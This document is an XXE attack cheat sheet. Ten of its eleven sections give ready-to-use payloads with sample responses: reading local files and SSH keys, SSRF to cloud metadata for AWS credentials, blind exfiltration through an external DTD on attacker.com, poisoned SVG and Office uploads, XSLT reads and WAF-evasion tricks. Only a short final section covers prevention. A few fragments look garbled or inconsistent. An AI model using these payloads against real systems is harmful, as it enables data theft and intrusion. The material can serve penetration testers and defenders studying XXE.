1. Classic XXE — Local File Read
The classic XXE payload defines an external entity that references a local file path using the file:// protocol. When the XML parser resolves the entity and the application reflects the entity value in its response, the file contents are returned to the attacker.
POST /api/xml-parse HTTP/1.1
Host: target.com
Content-Type: application/xml
Cookie: session=masaaki_session_token
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<userInput>
<username>&xxe;</username>
</userInput>
--- Response ---
HTTP/1.1 200 OK
{
"error": "Invalid username: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:..."
}
Other High-Value File Paths
# Linux
file:///etc/passwd
file:///etc/shadow # Requires root
file:///etc/hosts
file:///etc/nginx/nginx.conf
file:///var/www/html/.env
file:///proc/self/environ # App environment variables (DB passwords, API keys)
file:///proc/self/cmdline
file:///home/ubuntu/.ssh/id_rsa
file:///home/masaaki/.ssh/authorized_keys
file:///app/config.py
file:///app/settings.py
# Windows
file:///C:/Windows/win.ini
file:///C:/inetpub/wwwroot/web.config
file:///C:/Windows/System32/drivers/etc/hosts
file:///C:/Users/Administrator/.ssh/id_rsa
2. XXE SSRF — Internal HTTP Requests
External entities can reference not just file:// but also http:// URLs. The XML parser fetches the URL server-side — this is SSRF triggered through XXE. Combined with cloud metadata endpoints, this is a critical finding.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root><data>&xxe;</data></root>
--- Response contains ---
prod-ec2-role
# Follow up — fetch the credentials:
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/prod-ec2-role">
--- Response contains AWS credentials ---
{
"AccessKeyId": "ASIA3X...",
"SecretAccessKey": "wJalrX...",
"Token": "AQoX..."
}
# Internal service enumeration via XXE-SSRF:
<!ENTITY xxe SYSTEM "http://10.0.0.1:6379/">
# Redis banner: -ERR wrong number of arguments
3. Blind XXE — Out-of-Band via DNS
When the application parses XML but does not reflect entity values in its response, classic XXE appears to fail. However, the parser still resolves entities and makes outbound connections. An out-of-band DNS lookup confirms the vulnerability even with zero response reflection.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://r7k2z9x8.oastify.com/">
]>
<root><data>&xxe;</data></root>
--- Collaborator receives ---
DNS: r7k2z9x8.oastify.com from 54.203.xx.xx
HTTP: GET / HTTP/1.1 Host: r7k2z9x8.oastify.com
User-Agent: Java/11.0.14
# Confirmed blind XXE — now escalate to data exfiltration
# using external DTD technique (next section)
The DNS callback alone confirms that:
- The XML parser processes external entities
- The server makes outbound HTTP/DNS requests
- The egress firewall does not block outbound connections on port 80
4. Blind XXE — Data Exfiltration via External DTD
Reading a file through a blind XXE channel requires two components: a parameter entity that reads the file, and a second entity that exfiltrates the content via an HTTP request. The trick is that standard entities cannot reference other entities in an internal DTD — but an external DTD has this capability.
Host this DTD file at https://attacker.com/exfil.dtd:
<!-- exfil.dtd hosted on attacker server -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % wrap "<!ENTITY % send SYSTEM 'https://attacker.com/collect?data=%file;'>">
%wrap;
%send;
Then submit this XML to the target:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "https://attacker.com/exfil.dtd">
%dtd;
]>
<root><data>trigger</data></root>
--- Attacker server receives ---
GET /collect?data=root:x:0:0:root:/root:/bin/bash%0adaemon:x:1:1:... HTTP/1.1
php://filter/convert.base64-encode/resource=/etc/passwd) if PHP is the backend.
PHP Filter Wrapper for Clean Exfiltration
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % wrap "<!ENTITY % send SYSTEM 'https://attacker.com/b64?d=%file;'>">
%wrap;
%send;
# Attacker receives clean base64 — decode locally:
echo "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo=" | base64 -d
5. Error-Based XXE
When out-of-band HTTP connections are blocked by an egress firewall, error-based XXE is an in-band alternative. The technique triggers an XML parse error whose error message contains the file contents. Requires that verbose error messages are returned by the application.
<!-- Host on attacker server: error.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % error "<!ENTITY % boom SYSTEM 'file:///nonexistent/%file;'>">
%error;
%boom;
<!-- XXE payload to target: -->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "https://attacker.com/error.dtd">
%dtd;
]>
<root/>
--- Response error message ---
XML parse error: file not found:
/nonexistent/root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
The file contents appear in the error path — no outbound connection needed. Works even with strict egress filtering.
6. XXE via XInclude
XInclude is an XML specification that allows one XML document to include another. When you do not control the XML document's DOCTYPE declaration (e.g., your input is embedded server-side into a larger XML structure), XInclude lets you inject file reads without a DOCTYPE entity.
POST /api/product/search HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
query=<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>
--- Response ---
<result>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:...
</result>
parse="text" is critical — without it, the included file must be valid XML or parsing fails. Text mode reads arbitrary file content as a character data node.
7. XXE via File Upload
SVG Files
SVG is XML. Any endpoint that accepts SVG uploads and processes them server-side (resizing, converting, validating) is an XXE surface.
<!-- malicious.svg -->
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
<text y="20">&xxe;</text>
</svg>
# Upload via multipart form, then trigger server-side processing
# (e.g., convert to PNG, generate thumbnail, validate dimensions)
DOCX / XLSX (Office Open XML)
Office documents are ZIP archives containing XML files. The main content is in word/document.xml (DOCX) or xl/workbook.xml (XLSX). Unzip, inject XXE, rezip, and upload.
# Unzip the DOCX
unzip original.docx -d docx_dir
# Edit word/document.xml — add DOCTYPE to the XML declaration:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<w:document ...>
<w:body>
<w:p><w:r><w:t>&xxe;</w:t></w:r></w:p>
</w:body>
</w:document>
# Repack
cd docx_dir && zip -r ../malicious.docx . && cd ..
# Upload to "import document", "parse invoice", or "extract text" feature
OpenDocument Format (ODT)
# content.xml inside ODT ZIP:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE office:document-content [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<office:document-content ...>
<office:body>
<office:text>&xxe;</office:text>
</office:body>
</office:document-content>
8. XXE via XSLT Processing
XSLT (XSL Transformations) is XML-based. Many XSLT processors support external entities and document() function calls that read local or remote files. If an application lets users supply XSLT stylesheets, it is almost certainly exploitable.
<!-- malicious.xsl -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<output>&xxe;</output>
</xsl:template>
</xsl:stylesheet>
<!-- Via XSLT document() function — no DOCTYPE needed -->
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:value-of select="document('file:///etc/passwd')"/>
</xsl:template>
</xsl:stylesheet>
<!-- SSRF via XSLT -->
<xsl:value-of select="document('http://169.254.169.254/latest/meta-data/')"/>
9. XXE via Modified Content-Type
REST endpoints that normally accept JSON can sometimes be coerced into parsing XML by changing the Content-Type header. Many frameworks auto-detect content type or fall back to an XML parser if JSON parsing fails.
# Original request:
POST /api/users HTTP/1.1
Content-Type: application/json
{"username": "masaaki", "email": "[email protected]"}
# Modified request — swap Content-Type to XML:
POST /api/users HTTP/1.1
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<username>&xxe;</username>
<email>[email protected]</email>
</root>
# Also try:
Content-Type: text/xml
Content-Type: application/rss+xml
Content-Type: application/atom+xml
10. XXE Filter Bypass Techniques
WAFs and input filters may block common XXE patterns like SYSTEM, DOCTYPE, or ENTITY. These techniques evade string-matching filters.
Encoding Tricks
# UTF-16 encoding — parser decodes before WAF sees the plaintext
# Convert payload to UTF-16-LE or UTF-16-BE
Content-Type: application/xml; charset=UTF-16
# Declare encoding in XML declaration:
<?xml version="1.0" encoding="UTF-16"?>
# UTF-7 (older parsers):
<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo +AFs-
+ADwAIQ-ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACIAPg-
+AF0APg-
Parameter Entity Indirection
# When ENTITY keyword is blocked, use parameter entities only:
<!DOCTYPE foo [
<!ENTITY % a "fil">
<!ENTITY % b "e:">
<!ENTITY % c "//etc/passwd">
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
]>
# Some parsers allow concatenating parameter entities:
<!ENTITY % path "%a;%b;%c;">
Protocol Alternatives
# PHP-specific wrappers (bypass file:// filter)
php://filter/read=convert.base64-encode/resource=/etc/passwd
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
expect://id # PHP expect:// wrapper — RCE if enabled
# Java classpath loading
jar:file:///var/www/app/webapp.jar!/
jar:http://attacker.com/evil.jar!/
# netdoc:// (older Java)
netdoc:///etc/passwd
Bypassing Blocked DOCTYPE
# If DOCTYPE is WAF-blocked, try Unicode normalization:
<!doctype # lowercase
<!DOCTYPE # character reference for O
<!DO%43TYPE # URL-encoding (if double-decoded)
# Whitespace injection — some WAFs tokenize on space:
<!DOCTYPE
foo
[<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
11. Prevention & Mitigations
Disable external entity processing
The primary fix: disable DTD processing and external entity resolution in the XML parser. In Java: factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true). In Python lxml: use resolve_entities=False. In PHP: libxml_disable_entity_loader(true) (deprecated in PHP 8 — now disabled by default).
Use safe parser configurations
For Java SAX parsers, explicitly set: XMLConstants.FEATURE_SECURE_PROCESSING to true, and set ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_SCHEMA to empty strings. For .NET, use XmlReaderSettings with DtdProcessing = DtdProcessing.Prohibit.
Prefer JSON or protocol buffers
Where XML is not a hard requirement, switch to JSON or protobuf. JSON parsers have no concept of external entities. Removing the XML attack surface entirely is the most reliable mitigation.
Validate and sandbox file uploads
Process uploaded Office/SVG files in an isolated sandbox with no network access and no filesystem read privileges outside a designated directory. Use a dedicated microservice with a stripped-down container that has no credentials or sensitive files accessible.
Network egress filtering
Even when XXE is present, restricting outbound network access prevents OOB data exfiltration. Ensure application servers cannot make arbitrary outbound HTTP/DNS requests. This reduces blind XXE to error-based only (which requires verbose errors to be useful).
Audit all Content-Type paths
Ensure REST endpoints reject unexpected Content-Types. Return HTTP 415 Unsupported Media Type for application/xml if only JSON is intended. Configure frameworks to not fall back to XML parsing when the declared type is application/json.